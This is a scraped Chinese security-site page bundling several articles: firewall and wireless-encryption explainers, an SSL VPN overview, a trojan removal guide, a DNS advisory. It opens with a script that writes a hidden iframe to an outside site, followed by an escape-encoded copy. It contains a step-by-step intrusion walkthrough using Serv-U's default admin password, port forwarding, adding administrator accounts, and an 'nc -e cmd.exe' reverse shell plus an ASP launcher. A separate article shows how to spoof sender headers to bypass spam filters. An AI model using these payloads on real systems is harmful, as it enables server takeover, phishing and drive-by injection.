<script>document.write("<iframe src=http://www.slenk.net width=100% height=400></iframe><br>十三教程测试。")</script><script>

JS加密网:

http://www.webmasterhome.cn/tool/Encode.asp

加密后的代码:

<script>document.write(unescape('%3Cscript%3Edocument.write%28%22%3Ciframe%20src%3Dhttp%3A//www.slenk.net%20width%3D100%25%20height%3D400%3E%3C/iframe%3E%3Cbr%3E%u5341%u4E09%u6559%u7A0B%u6D4B%u8BD5%u3002%22%29%3C/script%3E%3Cscript%3E'))</script>

让你瞧瞧 黑客眼中的防火墙与路由器

作者:db19851217 来源:赛迪网技术社区

防火墙已经成为企业网络建设中的一个关键组成部分。但有很多用户,认为网络中已经有了路由器,可以实现一些简单的包过滤功能,所以,为什么还要用防火墙呢?以下我们针对NetEye防火墙与业界应用最多、最具代表性的Cisco路由器在安全方面的对比,来阐述为什么用户网络中有了路由器还需要防火墙。

一、 两种设备产生和存在的背景不同

1、两种设备产生的根源不同

路由器的产生是基于对网络数据包路由而产生的。路由器需要完成的是将不同网络的数据包进行有效的路由,至于为什么路由、是否应该路由、路由过后是否有问题等根本不关心,所关心的是:能否将不同的网段的数据包进行路由从而进行通讯。

防火墙是产生于人们对于安全性的需求。数据包是否可以正确的到达、到达的时间、方向等不是防火墙关心的重点,重点是这个(一系列)数据包是否应该通过、通过后是否会对网络造成危害。

2、根本目的不同

路由器的根本目的是:保持网络和数据的“通”。

防火墙根本的的目的是:保证任何非允许的数据包“不通”。

二、核心技术的不同

Cisco路由器核心的ACL列表是基于简单的包过滤,从防火墙技术实现的角度来说,NetEye防火墙是基于状态包过滤的应用级信息流过滤。

简单应用介绍:企业内网的一台主机,通过路由器对内网提供服务(假设提供服务的端口为tcp 1455)。为了保证安全性,在路由器上需要配置成:外->内 只允许client访问 server的tcp 1455端口,其他拒绝。

针对现在的配置,存在的安全脆弱性如下:

1、IP地址欺骗(使连接非正常复位)

2、TCP欺骗(会话重放和劫持)

存在上述隐患的原因是,路由器不能监测TCP的状态。如果在内网的client和路由器之间放上NetEye防火墙,由于NetEye防火墙能够检测TCP的状态,并且可以重新随机生成TCP的序列号,则可以彻底消除这样的脆弱性。同时,NetEye 防火墙的一次性口令认证客户端功能,能够实现在对应用完全透明的情况下,实现对用户的访问控制,其认证支持标准的Radius协议和本地认证数据库,可以完全与第三方的认证服务器进行互操作,并能够实现角色的划分。

虽然,路由器的“Lock-and-Key”功能能够通过动态访问控制列表的方式,实现对用户的认证,但该特性需要路由器提供Telnet服务,用户在使用使也需要先Telnet到路由器上,使用起来不很方便,同时也不够安全(开放的端口为黑客创造了机会)。

三、安全策略制定的复杂程度不同

路由器的默认配置对安全性的考虑不够,需要一些高级配置才能达到一些防范攻击的作用,安全策略的制定绝大多数都是基于命令行的,其针对安全性的规则的制定相对比较复杂,配置出错的概率较高。

NetEye 防火墙的默认配置既可以防止各种攻击,达到既用既安全,安全策略的制定是基于全中文的GUI的管理工具,其安全策略的制定人性化,配置简单、出错率低。

四、对性能的影响不同

路由器是被设计用来转发数据包的,而不是专门设计作为全特性防火墙的,所以用于进行包过滤时,需要进行的运算非常大,对路由器的CPU和内存的需要都非常大,而路由器由于其硬件成本比较高,其高性能配置时硬件的成本都比较大。

NetEye防火墙的硬件配置非常高(采用通用的INTEL芯片,性能高且成本低),其软件也为数据包的过滤进行了专门的优化,其主要模块运行在操作系统的内核模式下,设计之时特别考虑了安全问题,其进行数据包过滤的性能非常高。

由于路由器是简单的包过滤,包过滤的规则条数的增加,NAT规则的条数的增加,对路由器性能的影响都相应的增加,而NetEye防火墙采用的是状态包过滤,规则条数,NAT的规则数对性能的影响接近于零。

五、审计功能的强弱差异巨大

路由器本身没有日志、事件的存储介质,只能通过采用外部的日志服务器(如syslog,trap)等来完成对日志、事件的存储;路由器本身没有审计分析工具,对日志、事件的描述采用的是不太容易理解的语言;路由器对攻击等安全事件的相应不完整,对于很多的攻击、扫描等操作不能够产生准确及时的事件。审计功能的弱化,使管理员不能够对安全事件进行及时、准确的响应。

NetEye防火墙的日志存储介质有两种,包括本身的硬盘存储,和单独的日志服务器;针对这两种存储,NetEye 防火墙都提供了强大的审计分析工具,使管理员可以非常容易分析出各种安全隐患;NetEye 防火墙对安全事件的响应的及时性,还体现在他的多种报警方式上,包括蜂鸣、trap、邮件、日志;NetEye 防火墙还具有实时监控功能,可以在线监控通过防火墙的连接,同时还可以捕捉数据包进行分析,非分析网络运行情况,排除网络故障提供了方便。

六、防范攻击的能力不同

对于像Cisco这样的路由器,其普通版本不具有应用层的防范功能,不具有入侵实时检测等功能,如果需要具有这样的功能,就需要生级升级IOS为防火墙特性集,此时不单要承担软件的升级费用,同时由于这些功能都需要进行大量的运算,还需要进行硬件配置的升级,进一步增加了成本,而且很多厂家的路由器不具有这样的高级安全功能。可以得出:

具有防火墙特性的路由器成本——防火墙 + 路由器;

具有防火墙特性的路由器功能;

具有防火墙特性的路由器可扩展性;

综上所述,可以得出结论:用户的网络拓扑结构的简单与复杂、用户应用程序的难易程度不是决定是否应该使用防火墙的标准,决定用户是否使用防火墙的一个根本条件是用户对网络安全的需求!

即使用户的网络拓扑结构和应用都非常简单,使用防火墙仍然是必需的和必要的;如果用户的环境、应用比较复杂,那么防火墙将能够带来更多的好处,防火墙将是网络建设中不可或缺的一部分,对于通常的网络来说,路由器将是保护内部网的第一道关口,而防火墙将是第二道关口,也是最为严格的一道关口。

深刻讨论 了解掌握无线加密的一些选择

深刻讨论 了解掌握无线加密的一些选择

作者:db19851217 来源:赛迪网技术社区

你肯定不会设计一个没有防火墙的互联网接入的网络。因此,你怎么会架设一个没有加密的无线网络?理解无线加密对于部署一个安全的无线网络是非常重要的。

无线传输的安全类似于一个书面信息。有各种各样的方法来发送一个书面信息。每一种方法都提供一种增强水平的安全和保护这个信息的完整性。你可以发送一张明信片,这样,这个信息对于看到它的每一个人都是公开的。你可以把这个信息放在信封里,防止有人随意看到它。如果你确实要保证只有收件人能够看到这个信息,你就需要给这个信息加密并且保证收件人知道这个信息的解码方式。

无线数据传输也是如此。没有加密的无线数据是在空中传输的,任何在附近的无线设备都有可能截获这些数据。

使用有线等效协议(WEP)加密你的无线网络可提供最低限度的安全,因为这种加密是很容易破解的。如果你确实要保护你的无线数据,你需要使用WPA(Wi-Fi保护接入)等更安全的加密方式。为了帮助你了解这些选择,这里简要介绍一些现有的无线加密和安全技术:

有线等效协议(WEP)

有线等效协议是厂商作为一种伪标准匆忙推出的一种加密方式。厂商要在这个协议标准最后确定下来之前匆忙开始生产无线设备。因此,这个协议后来发现存在一些漏洞。甚至一个初入道的攻击者也能够利用这个协议中的安全漏洞。

Wi-Fi保护接入(WPA)

制定Wi-Fi保护接入协议是为了改善或者替换有漏洞的WEP加密方式。WPA提供了比WEP更强大的加密方式,解决了WEP存在的许多弱点。

临时密钥完整性协议(TKIP)

TKIP是一种基础性的技术,允许WPA向下兼容WEP协议和现有的无线硬件。TKIP与WEP一起工作,组成了一个更长的128位密钥,并根据每个数据包变换密钥,使这个密钥比单独使用WEP协议安全许多倍。

可扩展认证协议(EAP)

有EAP的支持,WPA加密可提供与控制访问无线网络有关的更多的功能。其方法不是仅根据可能被捕捉或者假冒的MAC地址过滤来控制无线网络的访问,而是根据公共密钥基础设施(PKI)来控制无线网络的访问。

虽然WPA协议给WEP协议带来了很大的改善,它比WEP协议安全许多倍,但是,任何加密都比一点都不加密好得多。如果WEP是你的无线设备上拥有的惟一的保护措施,这种保护措施仍然可以阻止随意地危害你的无线数据并且使大多数新入道的攻击者寻找没有保护的无线网络来利用。

SSL VPN网站守护神 SSL VPN接入保障

作者:db19851217 来源:赛迪网技术社区

基于SSL(安全套接层)VPN(虚拟专用网)的远程安全访问机制解决了门户网站的特殊安全需求。作为一种接入安全保障机制,它无疑充当着网站守护神的作用。

门户系统不同于其他业务系统,它涉及企业内部信息以及客户的隐私和安全性问题较多,系统部分或全部暴露于Internet公网之上,安全问题显得尤为重要。

在实现基于Internet的接入时必须考虑数据传输的安全性和访问的合法性。建设统一门户平台时,存在以下几个安全方面的需求, 保障数据在Internet上传输的安全性,检查各系统间访问的合法性和操作合法性, 记录用户的操作,便于查询和核实; 保护网站平台的安全性,避免恶性攻击或者病毒感染; 能及时进行系统缺陷更新服务和病毒库升级服务。

SSL VPN接入安全保障

为了保障内外门户松耦合机制、延伸内部人员办公区域、提高工作效率,在解决安全访问的需求时,必须考虑以下几个问题:

提供易于操作的界面,便于使用者迅速上手;

对用户侧没有预安装客户端软件的要求,能方便实用地迅速解决;

在外工作时必须能穿透各种类型网络的Firewall或者Proxy设备;

因此最适合以上需求的解决方案是基于SSL VPN(安全套接层,Security Socket Layer)的远程安全访问解决方案,该方案具有以下几个特点:

可以实现128位数据加密,保护数据在传输过程中不被窃取;

支持客户端证书的认证,并可以和USB Key结合使用,惟一地鉴定每一客户的合法性;

支持多种认证方式,提供对客户访问的合法性检查;

支持多种授权方式,保护客户的私密数据只能被“正确”的用户访问;

支持多层安全控制机制,保护后台服务器的安全性;

不需要安装任何客户端程序,所有访问操作都通过浏览器实现,因此非常方便用户使用;

可以穿透Firewall或者Proxy设备;

当然, IPSec也是部署VPN所采用的主要技术。附表对两种技术的实现方式做了技术和应用的对比,通过两种技术的优劣对比,选取更加适合门户系统的VPN技术。

系统部署

使用SSL VPN安全解决方案来保障系统的接入安全,还可以和公司安全认证系统相结合,通过建立PKI认证系统,确保各种人员、资源的身份,防止网络欺诈行为和抵赖行为。充分利用SSL协议做安全接入,可以统一为门户的客户端接入提供一种安全接入方式。

企业的业务系统一般已经部署了防火墙、防病毒、IDS/IPS等安全系统,SSL VPN系统可以和原有的安全设施结合起来,共同提高系统的安全性。它一般部署在防火墙的后面,以利用防火墙强大的防护功能。在认证方面,SSL VPN和内部的安全认证系统结合起来,通过PKI认证系统,可以确保各种人员、资源的身份。

通常在系统的网络边缘部署SSL VPN网关,SP(Service Provider)放在路由器和防火墙的后面,提供SSL VPN 接入。SP产品作为统一门户系统通过一个门户(portal)页面将各系统的对外接口纳入统一管理系统,对外通过Internet利用SSL加密技术安全地向公众开放统一的门户界面,对用户而言访问后台应用是完全透明的。SP在用户与后台WEB服务器之间起到了一个加密隧道的服务形式,所有的数据流通过SSL加密技术在SP上进行中转,用户与后台之间的数据交流完全保密。SSL VPN将实现与内部业务系统的高效无缝集成,能够节省公司的总成本,使网站维护成本降低,信息发布时间缩短。

统一门户系统需要一个操作实施简单、管理维护容易、不需要改变网络结构、运营成本低廉的方案。SSL VPN是以SSL 协议为基础的VPN技术,最大的好处就是不需要安装客户端程序,远程用户基本上不需要IT部门的支持就可以随时随地从任何安装了支持SSL协议浏览器的客户端安全地访问统一门户系统,从而最大限度地减少分发和管理客户端软件的麻烦。

SSL VPN通过TCP 443端口作为惟一的传输通道,因此管理员不需要在防火墙Proxy设备上做复杂设置,也不会因为不同系统的需求修改防火墙上的设定,降低了系统部署成本和IT部门日常性的管理支持工作费用。

SSL VPN检查策略

SSL VPN由于采用了SSL 技术,可以方便地通过数字证书认证享有PKI的高安全特性。通常选择安装客户端证书进行验证,给每个需要访问SSL VPN的人员分配个人证书,上面可以存放个人的一些信息,包括姓名、单位、部门、地址、EMAIL地址等。当客户端通过标准浏览器访问SSL VPN门户站点时,SSL VPN门户网关SP检查客户端的证书,这里的检查可以分为以下几种验证方法:

客户端证书+用户名/口令验证:在检查客户端证书的同时,仍需要客户输入其SSL VPN账号和口令,这样可以达到更高的安全性。

客户端+动态密码认证:支持动态密码认证,如RSA SecrueID、SecureComputing等,提供更高的安全性。

客户端证书+USB/智能卡验证:客户端证书存放在USB KEY或智能卡里面,只有具有这些硬件介质的用户才能登录SSL VPN。

投资者谨慎提防 小心网络中的“黑嘴”

投资者谨慎提防 小心网络中的“黑嘴”

作者:dblearn 来源:赛迪网技术社区

牛市进入疯狂期,懂股票的、不懂股票甚至从来没接触过股票的,都纷纷涌入到股市中,仿佛这就是一个金矿,只要肯挖,金子总会有的。而一如以往的牛市,这个时候也开始了消息漫天飞舞的壮观场景,利用这消息真假难辨的机会,“黑嘴”们又来了。

证监会日前公布对一“黑嘴”的立案稽查。该黑嘴是正牌证券分析师,但却在发表的文章中,不以事实为依据,大胆猜测、充分联想,最后得出了两家公司将被券商借壳的结论,误导了股民们。值得关注的是,这两家公司的股价恰恰那时出现了暴涨。这不能不让人心生警惕:有着合法执照的分析师尚且如此,那没有合法身份的呢?

从法律上讲,没有获得证券分析师资格的,是不能向投资者推荐股票的。这在传统媒体的正式推荐中得到了严格的执行。但随着近年来股票论坛、博客等新生事物的兴起,法律的监管正受到另类的挑战。在论坛中,所有的人都可以隐藏身份,推荐股票似乎也介于正式与非正式的模糊地带之间;而在博客中,博客的主人也可以隐藏身份,他们则更加大胆地推荐股票,有的甚至还招收起了会员。在一个身份难以确认的情况下,监管遇到了难题,而“黑嘴”们却开始活跃。

记者曾在某股票论坛中看到,某网民每隔几天推荐一只股票,而有一段时间推荐的股票都会大涨,这让其他网民对其分析能力非常佩服,也有很多网民在留言中表示自己跟进了他推荐的股票。但一个月后,风向突变,该网民开始热衷于推荐一些短期涨幅巨大的股票,并描绘这些股票的诱人前景,出于此前的信任,仍有很多网民留言表示跟进,但这些股票却从此时开始下跌,让跟进的网民吃了大亏。当上当的网民终于醒悟,开始在论坛中大骂该人是“黑嘴”,并提醒大家小心时,该人却再也没有在论坛出现过。

网络中的“黑嘴”比现实中的“黑嘴”更难监管,也让投资者更难提防。有了网络这个平台,“黑嘴”们传播信息的速度更快,也因为不用担心监管而将骗术玩得更高超。而随着网络技术的传播,越来越多的投资者喜欢利用网络获取信息,也喜欢上论坛上和别人交流股票经验,这正好为“黑嘴”们提供了肥沃的土壤。这一轮牛市中,被“黑嘴”们忽悠的投资者们并不在少数。对此,有业内人士指出,网络中的信息可靠性很难认证,投资者想避免上当的最好办法只有一个,就是不要抱有侥幸心理,对这里传播的信息最好不要理睬,在作出投资选择的时候,最好还是依据公开披露的信息。

业内人士同时呼吁,编造、散发不实信息,误导投资人,影响公司股价,属违法违规行为,这一点无论是在传统媒体上,还是网络上,都是适用的。尽管对网络用户的监管比较困难,但是,监管部门可以联手公安部门,尽最大努力去封杀网络上的“黑嘴”,保护投资者的利益。此外,也可以制定相应的法规,要求网站对论坛中的言论进行严格监控,不给“黑嘴”们表演的舞台。

小心 黑客利用Google挖掘你的隐私权

作者:db19851217 来源:赛迪网技术社区

总部设于美宾夕法尼亚州阿伦敦市的Security Constructs公司的执行总监汤姆.鲍尔斯(Tom Bowers)指出:IT专业人士必须对不法分子的这些技俩有个全面认识,这样才能时刻留心自己公司的珍贵资料不会出现在Google上。 "用Google能搜索到的信息都将变为公开信息。"他在上周波士顿召开的SecureWorld会议上说道。"现在关注自家的知识产权是否出现在Google上并采取正确防御策略以防止这一情况发生也是企业的职责所在。"

鲍尔斯并不是第一个提出"Google有可能被用于挖掘企业机密"这一警告的安全专家。渗透测试专家约翰尼.朗(Johnny Long)就曾用很大篇幅来解释将Google转变为恶意工具的各种途径,并且在他自己的网站johnny.ihackstuff.com上公布了一个Google黑客技巧数据库(Google hacking database ,GHDB)。鲍尔斯表示,虽然如此,但仍有许多企业并未清醒认识到Google威胁的真正可怕。

Google上周宣布,将开始在从数百万全球用户那所收集到的海量信息的前面设置一个匿名盾牌,以使在线搜索信息的提供者更难以被追踪到。不过到现在仍并没有迹象表明,这一措施将会减少鲍尔斯所说的那些风险。当然,唯一原因就是黑客们已掌握了避开这类防御盾牌的决窃。

对此,鲍尔斯指出,许多Google黑客都是经验丰富的间谍。而作为财富100强中一家制药公司的前任信息安全操作经理,鲍尔斯特别指出,已有制药公司雇佣情报收集人员用来了解他们的竞争对手。

黑客青睐Google专业搜索工具

Google黑客们能够利用Google的精确搜索工具来瞄准目标并且寻找财务文档以及安全分析报告,因为这些往往是潜在的信息宝库。所以黑客们更加青睐专业的Google工具,包括Google 地球(Google Earth)、Google 专利搜索(Google Patent Search)以及Google 博客搜索(Google Blog Search)等。

鲍尔斯表示:Google地球服务可被间谍们用于获取竞争对手工厂车间的卫星照片。而如果一家企业所拥有的其中一个专利包含的信息过多,那么Google 专利搜索将会显得特别有价值。"一旦你有一个专利想要公开,那么你在提呈这个专利相关信息时就必须要再三斟酌,"他表示。"你所提呈的信息仅包括能说明其独特性并足以取得专利的内容即可,若提呈太多信息则这些内容有可能会被你的竞争对手看到,那么他们就能复制你的工艺流程。专利可是一个真正的信息聚宝盆啊。"此外,博客也算是信息的一个极好来源,足以让一家企业用来对付另一家企业。在博客世界里能共享许多观点,有时甚至还能共享许多的知识产权。

不过鲍尔斯也表示,也许最好的情报工具要算是Google快讯(Google Alerts),它能基于用户定制的规格为用户提供其所要的内容。"你能借助这种搜索方式来实现数据挖掘、商业智能(BI)和计算机取证,"他表示。"我的Google快讯是设定为以每日电子邮件形式发送给我的,使用起来非常容易,而且你能用它来快速发现你公司的信息并展开相应调查。"当然,调查是关于这些资料信息是如何出现在Google上的。

此外,鲍尔斯发现Google还能用来挖掘那些企业认为已经销毁的表单文件。这些表单文件中某些可能还包括用户名及密码等有价值的细节资料。比如:他就曾在一个案例中,通过运用Google发现了一个带有账户名称及密码的电子数据表。

企业应尽快撤销Google上的敏感数据

按照Google发言人的说法,他们所开发的桌面搜索工具目的是让用户更方便快捷地查找存在硬盘上的数据,因而不会对其可能引起的此类安全问题做特殊处理。除了Google之外,其他一些公司如Blinkx和Copernic也提供类似的搜索引擎,而象ISYS、X1、雅虎、微软等公司据称也正在开发此类产品。显然,能够让企业泄密的搜索工具变得越来越多,企业必须引起足够的重视,以防数据泄漏。

对于那些在Google上查询自已公司信息的IT专业人士,鲍尔斯建议先以一个问题起头,然后再精确调整这个搜索,问更多问题并进行更精确的搜索。一旦发现公司信息,就执行一个源数据分析来确定文档的生成日期并找到隐藏的超链接。而对于那些确实发现自家公司敏感数据在Google上散播的那些人来说,Google为他们提供一个在线表格,他们可在表格中填入要求Google撤下的内容。 更多内容请看Google工具和服务专题专题,或进入讨论组讨论。

亲手揪出在系统里疯狂作案的魔域盗贼

亲手揪出在系统里疯狂作案的魔域盗贼

作者:金山 来源:赛迪网

来自金山毒霸反病毒中心最新消息:4月7日,一名为“魔域盗贼”变种MS(Win32.Troj.OnlineGames.ms)的网游盗号木马异常活跃,仅4月7日一天,金山毒霸客户服务中心就接到数百用户的求助电话。此变种除了盗取“魔域”帐号外,还可盗取“完美世界”和“浩方游戏平台”的账号密码,比之前的一些变种更加险恶。

金山毒霸反病毒专家戴光剑表示,“魔域盗贼”变种MS并非一普通的游戏盗号木马,它可用特殊的方法逃避杀毒软件的查杀,而且由于病毒本身存在一个缺陷,所以用户一旦中招,系统在启动过程中将无法显示桌面,致使用户无法看到桌面图标,而只能看到一个空白的桌面。

专家介绍,该病毒运行后,会把自己拷贝到系统目录中,并释放一个病毒文件C:\Windows\system32\wsttrs.dll(Win32.Troj.Onlinegames.nb.12288),之后病毒体将自行删除。

用户一旦感染该病毒,病毒会寻找网络游戏“魔域”等的游戏进程,并使用钩子读取用户输入的游戏帐号与信息,把得到的信息通过wsttrs.dll文件以网站上传的方式发送到木马种植者事先指定的网站上去,使用户的游戏帐号丢失。

金山毒霸从5日开始就发现了该病毒的多个变种,而截止到目前,金山毒霸客户服务中心已接到数百用户的求助电话。针对该病毒的传播特点,金山毒霸反病毒中心及时进行了病毒样本分析,毒霸用户只要升级病毒库到2007.04.07.16,即可查杀该病毒目前所有变种。此外,对于非毒霸用户,金山毒霸反病毒工程师为您提供了一套手动清除方案,您可以根据方案中的清除方法彻底清除该病毒。

亲手揪出盗贼——“魔域盗贼”变种MS的手动解决方案

1、在Windows XP及其以上系统中

当无法进入桌面的时候,调出Windows任务管理器(Ctrl+Alt+Delete调出),切换到进程标签,然后找到 wsttrs.exe进程,选中后单击右键结束进程,既可正常显示桌面。

2、在Windows 2000及其它系统中

需要进入带网络连接的安全模式,升级毒霸到最新版本(2007.04.07.16),对Windows目录进行查毒,病毒查杀结束后,重启系统即可正常显示桌面。

3、当以上两种方案都不能成功,则有可能是该病毒的最新变种,应进入安全模式,打开注册表编辑器,定位到HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Windows\CurrentVersion\RunOnce(注意是RunOnce不是Run)

查找启动程序位于 系统盘\Windows 或者 系统盘\WinNT 文件夹下的启动项。

例如:

wstthrs    c:\Windows\wsttrs.exe

或者wstthrs  c:\winnt\wsttrs.exe

删除改键值,并向金山毒霸提交该文件,重启系统既可。

Webshell与Serv-u结合获系统最高权限

作者:db19851217 来源:赛迪网技术社区

Serv-U默认监听127.0.0.1:43958,在本机才能连接这个管理端口,Serv-U默认管理账号是localAdministrator,默认密码是"#l@$ak#.lk;0@P",这个密码是固定的。在目标机器上运行fpipe -v -l 12345 -r 43958 127.0.0.1,然后在你自己的机器,用"Serv-U administrator"新建SERVER。

目标IP:12345

User:LocalAdministrator

Pass:"#l@$ak#.lk;0@P"0

那么目标机器的Serv-U就归你管了。

利用的前提:要有目标机器的普通权限的SHELL,不需要能终端或物理控制台登录,只要有个shell,能运行端口数据转发的程序就可以了

如何得到一个shell:sql注射得到webshell或者直接利用动网7.0 sp2以下的上传漏洞上传webshell

具体实施方法

1.利用得到的webshell上传转向程序fpipe,然后执行fpipe -v -l 12345 -r 43958 127.0.0.1

2 .在你自己的机器,用"Serv-U administrator"新建SERVER,依次填入

ip:目标IP

端口 :12345

User:LocalAdministrator

Pass:"#l@$ak#.lk;0@P"

现在你就可以管理这台服务器的Serv-U了,新建一个账号,权限为系统管理员(system dministrator),并在"目录访问(Dir access)"选项中给予"执行"权限(execute).

3. ftp连接,然后执行

quote site exec net user iisuser password /add

添加一个用户名为iisuser密码为password的用户,加到管理员组 quote site exec net localgroup administrators iisuser /add,现在就可以连接终端并登录了。

当然也可以进行别的操作,例如上传一个nc.exe,在目标机器上得到一个管理员权限的shell,可以正向连接,也可以反向连接。

正向连接:连上ftp以后执行

quote site exec nc.exe -l -p 23 -t -e cmd.exe

这时目标主机就成了一台telnet服务器,你可以telnet上目标服务器的23端口.

反向连接:假设你的IP是202.96.209.168

1.先在自己的机器上运行(你要有一个外部IP):nc -vv -lp 99

2.在目标机器上运行 nc -e cmd.exe 202.96.209.168 99

在你的机器上就会得到一个目标机器的具有管理员权限的shell

如果对方进行了端口过滤或者设置了防火墙的保护( 这种保护不限制反弹连接,如果限制的话就要换别的方法)可以用TCP SOCKET转发来实现。

打个比方:

我的机器为 A;

我要测试的机器为 B[不允许正面连接];

我已经在B上得到呢一个SHELL[只要guest的就行呢]?

我们可以这样连上对方的43958:

I:我在本地监听二个端口23和56

23是等待B来连接的;

56是等待我来连接的;

II:B连接我监听的23,同时转发到本地的43958

这样管道就建好呢~对方的防火墙就拿我们没有办法呢?

此时在本地运行Serv-U新建一个SERVER,IP填上本地的127.0.0.1端口为56用户localAdministrator,密码#l@$ak#.lk;0@P。

具体实施方法

假设你的IP是 202.96.209.168

1.在你自己的机器上运行 htran.exe -listen 23 56;

2.此时在本地运行Serv-U新建一个SERVER,IP填上本地的127.0.0.1端口为56,用户名LocalAdministrator,密码#l@$ak#.lk;0@P;

3。在目标机器上运行 htran.exe -slave 127.0.0.1 43958 202.96.209.168 23

如果不能在webshell下直接运行,可以写一个asp脚本来执行,内容如下:

connect.asp

<%

Set oScript = Server.CreateObject("WSCRIPT.SHELL")

oScript.Run (server.mappath("htran")&" -slave 127.0.0.1 43958 202.96.209.168 23 ")

%>

执行http://目标网址/connect.asp,如果出来一片空白,没提示什么错误,现在你应该可以管理目标服务器的Serv-U了,余下的事情就看您自由发挥了。htran.exe是一个多线程包转发工具,可以到红盟下载

防止方法

自己给Serv-U打补丁,改变默认端口及管理密码。修改 ServUAdmin.exe、ServUDaemon.exe这两个文件,改端口只要在ServUDaemon.ini文件[GLOBAL]选项中加入LocalSetupPortNo=12345即可

很遗憾,在Serv-U的最新版本Serv-U 5.2.0.0中依然没有任何改变,默认的管理端口及密码还是原来的。

小试Yahoo和Hotmail的防垃圾邮件能力

小试Yahoo和Hotmail的防垃圾邮件能力

小试Yahoo和Hotmail的防垃圾邮件能力
jinjin52328@hotmail.com

一、中文Yahoo防止伪造邮件头的能力:

随便申请一个中文Yahoo帐号,假设为xxxx@yahoo.com.cn,利用免费提供的SMTP服务发信。首先来看Outlook Express发信的情况,收信人的邮箱看到的是正常的东西,如下:

//-------------------------------------
发件人 : yanzi
发送 : 2005年3月28日 5:26:42
收件人 :
主题 : 最近好不好呢
//-------------------------------------

OK,现在看到的是正常的,然后再来做个试验。操起我们的winsock编程,发送smtp命令,完成登陆,然后在data命令后,自己构造邮件头信息,在From:字段中填写

From: "安全焦点会议组"

其他的正常填写,发送到跟上面的同一个邮箱。现在去看信,有意思的现象出现了,明明是从一个Yahoo的邮箱发过来的邮件,显示的却是下面的东西:

//-------------------------------------
发件人 : 安全焦点会议组
发送 : 2005年3月28日 5:30:12
收件人 :
主题 : 最近好不好呢
//-------------------------------------

现在可以看到了,Yahoo并没有检验在邮件头中填写的发信人信箱是否与当前发信的用户邮箱相同,这样就给了发信人利用Yahoo邮件服务器伪造源地址发送垃圾邮件的机会。如果各位邮箱中突然出现了发件人是安全焦点会议组发来的邮件,那么会不会当作垃圾邮件删除呢。或者如果邮件内容是推荐下载某个未知漏洞工具,呵呵,而其实是个不怀好意的人伪造的,各位就很容易被骗了。

目前发送到Hotmail、Yahoo邮箱中的邮件发件人可以轻松伪造,国内的邮件服务器一样不能避免。当然,通过IE浏览器和通过OE看信的效果都是一样的,都会出现伪造的源地址。

二、躲避Yahoo和Hotmail的垃圾邮件检查

同样利用上面申请到的中文Yahoo邮箱帐号,利用SMTP服务正常发信到xxxx@hotmail.com,然后将这封邮件标记为垃圾邮件。此后,利用该Yahoo邮箱向xxxx@hotmail.com发信,都会被Hotmail自动放置到垃圾邮件夹中。

现在我们的试验开始了,操起winsock编程,构造邮件头,在From:字段中填写

From: "安全焦点会议组"

其他的正常填写,发送到xxxx@hotmail.com。现在去看信,有意思的现象出现了,竟然发送到了Hotmail邮箱的收件箱里面,明明被标记为垃圾信件的邮箱地址,改头换面一番,照样混过了Hotmail的检查。

更进一步,我们发的邮件还是有可能被Hotmail定义为垃圾邮件的,那么更有效的办法就有了,如果你知道对方邮箱的一个联系人邮箱,那么就把这个邮箱填到From字段里面吧,这样,你的邮件在Hotmail的邮箱里面就会畅通无阻了。

看来Hotmail也只是检查了邮件头信息中的From字段,并没有检查Received:字段中的源地址,这样,只要在From中不是在垃圾邮件列表中的邮箱,就可以躲开Htomail的检查。

同样的,Yahoo跟Hotmail一样,同样可以通过伪造发信人来躲开垃圾邮件的过滤。

三、总结:

目前好像除了SMTP服务器上做检测外,没有特别容易的办法。当然如果通过OE收信,可以去看一下详细的邮件头信息,里面可以清楚地看到真实源邮箱地址,不过又会有几个人去注意呢。

这个技术加上社会工程学,就可以对指定的邮箱去实施欺骗,基本上受害者属于被骗了还被蒙在鼓里。

最后声明:本文纯粹为探讨问题,并未鼓励任何形式的欺骗攻击行为。

曝DNS服务漏洞影响所有Windows服务器

曝DNS服务漏洞影响所有Windows服务器

作者:db19851217 来源:赛迪网

微软新发布了一份关于DNS服务RPC接口的安全公告,公告中提示DNS服务的RPC接口存在缓冲区溢出漏洞,攻击者通过这个漏洞可以获得本地系统权限。该漏洞会影响Windows 2000 Server和Windows 2003的所有版本。

记者从绿盟科技安全研究小组了解到,在对该漏洞进行跟踪分析后发现,利用该漏洞无需认证,通过匿名访问就可以实现攻击,并且这是一个易于编写攻击代码的堆栈溢出漏洞,所以危险程度相当高。绿盟科技的安全专家建议广大Windows服务器用户,尽快检查自己的系统是否开放了DNS服务,如果并不需要使用该服务,最好将其停止并禁用;如果确实需要开放该服务,建议按照绿盟科技提供的临时解决方案进行安全配置。

目前已经有黑客利用此漏洞进行入侵的报告,微软也正在着手开发相关补丁,所以绿盟科技提醒业界关注微软官方网站获取最新补丁。同时建议受影响的用户尽快采取临时措施进行防范。

临时解决方案如下:

如果您不需要提供DNS服务,则可以在控制面板->管理工具->服务中将DNS Server服务关闭。 如果您确实需要提供DNS服务,可以通过禁用DNS的RPC接口来阻止远程攻击。

1、在开始菜单上点击“运行”,输入“Regedit”,然后按回车,打开注册表编辑器。

2、找到这个键值。

“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters”

然后新建一个“双字节值”,命名为“RpcProtocol”。

3、将“RpcProtocol”的值设置为“4”。

4、重启DNS服务。

上述操作不会影响通常的DNS服务。

Windows服务器安全缺陷影响到域名服务

作者:hanbin 来源:赛迪网

据国外媒体报道,今年微软公司Windows操作系统零天缺陷是潜在的、最严重的安全缺陷之一,微软报告称,在它的Windows服务器系统中发现了一个危险的零天缺陷。由于缺陷潜在的影响了企业网络,因此在服务器软件中利用这一缺陷进行的攻击被认为特别严重。

在公司的安全咨询中微软表示,在公司的Windows 2000 Server SP4、Windows Server 2003 SP1和Windows Server 2003 SP2软件中,这一缺陷影响了域名系统服务器提供的服务。

微软指出,公司最初的调查显示,这一缺陷试图允许攻击者运行域名系统服务器服务的相关安全代码。这些安全代码运行默认的当地系统。

到目前为止,除非用户提出强烈要求,微软还没有在每月的安全补丁周期外发布专门解决这一缺陷的补丁。

Microsoft内容管理服务器跨站脚本漏洞

作者:db19851217 来源:赛迪网技术社区

受影响系统

Microsoft Content Management Server 2002 SP2

Microsoft Content Management Server 2001 SP1

描述

BUGTRAQ ID: 22860

CVE(CAN) ID: CVE-2007-0939

Microsoft内容管理服务器(MCMS)是一款企业WEB级别内容管理系统,可以构建、配置、维护公司Internet、Intranet、Extranet Web环境。

